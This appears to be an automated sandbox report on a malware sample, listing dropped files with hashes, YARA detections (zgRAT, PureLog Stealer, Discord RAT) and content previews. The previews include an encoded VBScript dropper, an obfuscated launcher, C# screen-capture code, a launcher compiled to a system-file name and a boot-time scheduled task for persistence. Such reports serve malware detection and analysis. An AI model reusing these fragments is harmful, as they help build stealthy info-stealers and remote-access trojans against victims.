                                                                                                                                                                              SHA-256:E09540A47F3647A9FDF9673281E2664441BBAEE8D3236D22B1875B9D23ABACAB
                                                                                                                                                                              SHA-512:6A16B367A762132172830FD81C41C58AC49DE788EED93D4C5526F8F0E6859703B336A137FD8D4FE7088B4110D72E5F4767B6462BC4651769924B67305719F30A
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:%lJWFircOu%%nvRebZgpg%..%kImkMpPKuFLx%"%Temp%\msAgentSavesmonitor/ChainComServermonitor.exe"%EaZpTohGW%
                                                                                                                                                                              Process:C:\ProgramData\svchost.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):217
                                                                                                                                                                              Entropy (8bit):5.712224367043722
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:GmvwqK+NkLzWbHnPv7qK+NkLzWHFojm8eGxjs:G1MCzWLnP/MCzWlStjs
                                                                                                                                                                              MD5:D6DA6166258E23C9170EE2A4FF73C725
                                                                                                                                                                              SHA1:C3C9D6925553E266FE6F20387FEEE665CE3E4BA9
                                                                                                                                                                              SHA-256:78EE67A8AE359F697979F4CD3C7228D3235C32D3B611303E070B71414591BA1E
                                                                                                                                                                              SHA-512:37A5A18ACBB56E5458BAEBB12A4D3B3229B218EB606BE3535D1C30E8E0D4FA969543889C587078456321209FE4503688432F45FF35A7AF598B770393E7AE3B05
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:#@~^wAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v!b@#@&j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.k4?4+sscIEU~r]P+s2uzhkbT+xD?m-+k:GxbYG.JzWVLX!V/bTfL+2}&dL//c4CYrSPZ~~WmV/n8j0AAA==^#~@.
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                              File Type:MSVC .res
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):652
                                                                                                                                                                              Entropy (8bit):3.1034386329121957
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryclRak7YnqqnlWPN5Dlq5J:+RI+ycuZhN2jakSnsPNnqX
                                                                                                                                                                              MD5:AE4BFC3FB4A8DDBAF2198475B919E352
                                                                                                                                                                              SHA1:12B9EA0561BDB57740E65618044999B7A22A4643
                                                                                                                                                                              SHA-256:47FFAC32D8AF730DDD8DBC22166C8BACA4E9E395D04CE95021E49E09FB5E815F
                                                                                                                                                                              SHA-512:0BEE2001B4CAFC48516B95D0022824621DC213174ADD02B4D8CCB7697CE2683DCEBB3EA83D1EB90E5BC971F7B531D45037E7BDB779BACFD59E7CBB864BEB6222
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.1.f.f.b.x.q.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...r.1.f.f.b.x.q.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1004
                                                                                                                                                                              Entropy (8bit):4.154581034278981
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                              MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                              SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                              SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                              SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):607
                                                                                                                                                                              Entropy (8bit):5.364493667515013
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6KOkuqy776SE71xBkuqTM3RDwA+iM3RLB5wkn2h:p37Lvkmb6KOkqe1xBkrk+ikOfcWZEif5
                                                                                                                                                                              MD5:3A51456AA0E9B354E2C1C7FF756C56CD
                                                                                                                                                                              SHA1:654C3C17460D017940E0D78779ABF6EF245C1265
                                                                                                                                                                              SHA-256:C49F37E435C2276A9D768DB57CED6DBE64FCE13058086A124F6FCD55C5F3AE2D
                                                                                                                                                                              SHA-512:0307D63C2E7D5BEDE6BA57150E2342BD57185F3EAAB3BC071CBFBB905823E0E026E98E885A3AC669C5EF8044E29BB32083F86A42129227095EBE1C453C30C800
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.0.cs"
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                              Entropy (8bit):3.162094740254717
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:6M7oEAtf0KhzBU/Ef6mtJbN0IpW1ul2ja3n8q:wNz0LmTOueK
                                                                                                                                                                              MD5:2ABD48C908EFFBAB737C437CCCEA9FDA
                                                                                                                                                                              SHA1:5DE708B5FDBA6EF9BA5BEC133293F59C5441B7F2
                                                                                                                                                                              SHA-256:509BDF849ADB0201949CBEBB0E3200B48021A21219DA485B58DBC25306E1EEA7
                                                                                                                                                                              SHA-512:13574EB54362F84CBABE9CE88759E05660D7784C4A7C6223604477AA2215A93189700BB5827D73440B856D454BD5744C0CEA1CFB6CC317315F960E796162AC60
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ef.f...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
                                                                                                                                                                              Category:modified
                                                                                                                                                                              Size (bytes):1148
                                                                                                                                                                              Entropy (8bit):5.524842573920555
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:KJf+Id3ka6KOkqeFkOfNEif8Kax5DqBVKVrdFAMBJTH:u+kka6NkqeFkyNEu8K2DcVKdBJj
                                                                                                                                                                              MD5:BD340CA15980A7893A37BF7CB1FDE9BB
                                                                                                                                                                              SHA1:140AA01E96275121C03354A88509A9E7EEF436D9
                                                                                                                                                                              SHA-256:113DFD48477798775DCB0C0C416484711E6371D10F527A9A902681A0E4EC781A
                                                                                                                                                                              SHA-512:F7234766FEC8D923CD3A461D63C8C6064CB2F686A5D992981C9413EC337A6642484DF4054A8BCA6518610233F056288266EB2C6F3DF519ABC84F4BF9C076D8AB
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):373
                                                                                                                                                                              Entropy (8bit):4.864872342857448
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L2hwBGXsiFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLB3
                                                                                                                                                                              MD5:7772F79D9884E052D03C252F261A4D39
                                                                                                                                                                              SHA1:55737112AC33F2DFD71E1EF19A241B11A521D038
                                                                                                                                                                              SHA-256:1304C8532A0B0CC157665EC70AE3A10C82F91573613A82FC68D5DB95439B4589
                                                                                                                                                                              SHA-512:4BCC3326C77850B84B04EC3BE0067B094C77947DA8F6198B48BE2294C008BBABD19B2F173AF5D1C147431E8C2DFA4EE210CE55C92E04A909063B396622106A49
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\user\cscript.exe"); } catch { } }).Start();. }.}.
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):250
                                                                                                                                                                              Entropy (8bit):5.0489813326376165
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fkb8HDyA:Hu7L//TRq79cQWfsb8HDyA
                                                                                                                                                                              MD5:818938ADE525862CA78632707D773306
                                                                                                                                                                              SHA1:99F0B908FEDF4F3E0E9704767A23CB12FBAC9671
                                                                                                                                                                              SHA-256:8554875EAD824596D20C90049FDE751BB128DE831D0B3608C7ACA516996D6321
                                                                                                                                                                              SHA-512:1A2077066E374B15B92ABE28E4E5B48079889B22F151A49A7A279380D71860645537731CA21AA8F809E5FA82CA49278D0C24D31B8EB39047B1C8F7869DD4DF25
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.0.cs"
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (360), with CRLF, CR line terminators
                                                                                                                                                                              Category:modified
                                                                                                                                                                              Size (bytes):781
                                                                                                                                                                              Entropy (8bit):5.250275821824712
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:KJfC6MI/un/Vq79tWfskDy1Kax5DqBVKVrdFAMBJTH:uCTN/Vquw1K2DcVKdBJj
                                                                                                                                                                              MD5:41408A7809193D009BB595B5DBFDDFDE
                                                                                                                                                                              SHA1:3A354CF6DC335D33E1367C9E9A5947036E2D58D1
                                                                                                                                                                              SHA-256:B75005093845067B6D78B83196D3338742503130F179315845E671CEB3EAC41A
                                                                                                                                                                              SHA-512:DE087D967508FC37105A2C2516C125E78F5A75B87D7AF67BDFCBB9F9D861E5B773C17FD9D0A1BF0D9A43DCE330F8972236901D058176F7A78D89D4EC5F266820
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:.C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                              Process:C:\ProgramData\setup.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):161792
                                                                                                                                                                              Entropy (8bit):5.8318794599287465
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:lQbW78Kb89UMmY8MA1cRWr7BiKcOO1Sf7lHn4mr3yo4f8P2:lQK75bobwfBiKCYfhHLU5
                                                                                                                                                                              MD5:1667C96053EAA078109F8B0C9500FC9D
                                                                                                                                                                              SHA1:E0F567763BAAAA757F66F96951D9810F45F69F30
                                                                                                                                                                              SHA-256:F7E1E53A6FB24A2BD9206305C59448A8F99B6F5847A6ACB18EB0FD9F7383FFB4
                                                                                                                                                                              SHA-512:6285ADE5CB85B71814EDD57EDDC512A031596043B7FCE4FCC909A0B78ECFE161C062AD0637EC82CBDAA36675AD32FBD0C94DDD96BB575BE8B1FBB47DF706AAE1
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@.......................................sr......!..L.!This program cannot be run in DOS mode....$.......K...............D.......D...........o...9A......9A9.....9A......Rich............PE..d....t.d.........."....%.....X......X".........@..........................................`..................................................8.......p..`>...`..8....................5..8............................................0...............................text............................... ..`.rdata.......0......."..............@..@.data........P......................@....pdata..8....`.......6..............@..@.rsrc...`>...p...@...8..............@..@........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\ProgramData\setup.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1490
                                                                                                                                                                              Entropy (8bit):5.1015990235428035
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:2dk4+SkIMFWYL60YeGlMhEMjn5pwjpILUYODOLqx49RJh7h8gJ15E15LNEB86tn:cC3IQDL60uydbQ9IIYODOLqOdq2sbEx
                                                                                                                                                                              MD5:546D67A48FF2BF7682CEA9FAC07B942E
                                                                                                                                                                              SHA1:A2CB3A9A97FD935B5E62D4C29B3E2C5AB7D5FC90
                                                                                                                                                                              SHA-256:EFF7EDC19E6C430AAECA7EA8A77251C74D1E9ABB79B183A9EE1F58C2934B4B6A
                                                                                                                                                                              SHA-512:10D90EDF31C0955BCEC52219D854952FD38768BD97E8E50D32A1237BCCAF1A5EB9F824DA0F81A7812E0CE62C0464168DD0201D1C0EB61B9FE253FE7C89DE05FE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <BootTrigger>.. . <Enabled>true</Enabled>.. </BootTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">... <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <Duration>PT10M</Duration>.. <WaitTimeout>PT1H</WaitTimeout>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabl
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):216
                                                                                                                                                                              Entropy (8bit):5.72500271217595
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:6xpgoJIbQrWdwQj1aFz/wkTQ+D3Tr1NyHCAcNESLQrkSo01mBkmNWc09RRVmtIq7:egoJFrW74FNPSmNE4SoMmSmnjT
                                                                                                                                                                              MD5:6CA437BA9CBE773C4FEB7925219F4FA7
                                                                                                                                                                              SHA1:F4937B63C7A8BE750E2E827F361438F94AA9CA42
                                                                                                                                                                              SHA-256:EF6EA15E26771712A4C64E916E73F93CAD96F9AD6D6EA5960278F9205886D21F
                                                                                                                                                                              SHA-512:32DAB39F35FDE15459621EBD219DAAF7E35EBF5200B701256DFE5EEEBA045F9C8B964FFEFF5CB6B033B7CCD03FE4A109EDADDA33AFF3D01E85178D0577D84B3B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:KBV7AhYL7PfWiwA9GuAix0EEM1umZv53I3xsuqJoYqmlX95Oiwv6ioZT7QvIxwwLTmOp9SPZlVJHOdrN6fEmA8Uddeud5B1m3aRvvPPPhWVNfREdjiLRrJLVSuLfhvejehNyM5brQyFnmH8MZQ3W0j4uO5cADtsv2wt8EPRnGdA3DhsLv9FQ2Ht4mckQdbngGUv0YAHJ8PQWjBqqMROEob2v
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3720704
                                                                                                                                                                              Entropy (8bit):7.733352681119499
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
                                                                                                                                                                              MD5:5FE249BBCC644C6F155D86E8B3CC1E12
                                                                                                                                                                              SHA1:F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
                                                                                                                                                                              SHA-256:9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
                                                                                                                                                                              SHA-512:B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\powershell.exe, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\powershell.exe, Author: Joe Security
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...
                                                                                                                                                                              Process:C:\Users\user\Desktop\87Bym0x4Fy.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):22224360
                                                                                                                                                                              Entropy (8bit):7.999088376739381
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:393216:b8zTb8tvaGXUeGj1/fBtFAnBMhsP8ZMKNiPJHREPKmahPKDpn:b83JDD1Rt2nB0uKNo6ahPKN
                                                                                                                                                                              MD5:A83964F260C28614DA067F6B3DF9E044
                                                                                                                                                                              SHA1:157304B579228E7D41E6218EAC935339854BB431
                                                                                                                                                                              SHA-256:F5D2B5A19575E7B3041B846263316F66F80C2804F9E0F2376E1576612D27CCA8
                                                                                                                                                                              SHA-512:DD4E8FA7FB45F091FD875EB347BB594EF7D890921255E2BA985E4F96A938B4997CE81F51A5951F3633D93C38E336E8FB4DC7EEEC6545203076865EC6B0E232E1
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Xhc.Xhc.Xhc...`._hc...f..hc...g.Rhc...[hc..`.Qhc..g.Ihc..f.phc...b.Shc.Xhb..hc.K.g.Ahc.K.a.Yhc.RichXhc.........PE..d....8.f.........."....(.....r.................@......................................S...`.................................................l...x............`..."..............h.......................................@...............P............................text............................... ..`.rdata..B&.......(..................@..@.data....s..........................@....pdata..."...`...$..................@..@.rsrc...............................@..@.reloc..h...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\Desktop\87Bym0x4Fy.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):80896
                                                                                                                                                                              Entropy (8bit):5.530506199019335
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:lCH0jBD2BKkwbPNrfxCXhRoKV6+V+y9viwL:MUjBD2BPwbPNrmAE+Mqq
                                                                                                                                                                              MD5:95AF6E5D52A57515DC2E638C419F50D9
                                                                                                                                                                              SHA1:D359ABC0EBB9877C917E125FB4E28C24B27696A4
                                                                                                                                                                              SHA-256:0FE67ABFD1A323E19A065A54D544F0997F5853F7A51A3526C10C1A15BF5B5749
                                                                                                                                                                              SHA-512:CFB2D075D75AF7F965E961ECCBF3F188E64A5B594E556A9BF8569F2C2380065FB2781E4E4689D87B7AF65066CAC217E59CF0A7D32F43F2BD61938AA06791B50B
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_DiscordRat, Description: Yara detected Discord Rat, Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe, Author: Joe Security
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0..4............... .....@..... ...............................w....`...@......@............... ...............................`..............................pQ..8............................................................ ..H............text....2... ...4.................. ..`.rsrc........`.......6..............@..@........................................H.......8...8.............................................................{....*"..}....*....0..7.........(....}.......}.......}......|......(...+..|....(....*..0..?.........(....}.......}.......}.......}......|......(...+..|....(....*..0..7.........(....}.......} ......}......|......(...+..|....(....*..0..7.........(....}%......}&......}$.....|%.....(...+..|%...(....*..0..?.........(....}-......}/......}.......},.....|-.....(...+..|-...(....*2.(....o....*J. . ..}.....(....*2.(....(.
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):33280
                                                                                                                                                                              Entropy (8bit):5.634433516692816
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                                                                                                              MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                                                                                                              SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                                                                                                              SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                                                                                                              SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):85504
                                                                                                                                                                              Entropy (8bit):5.8769270258874755
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                                                                              MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                                                                              SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                                                                              SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
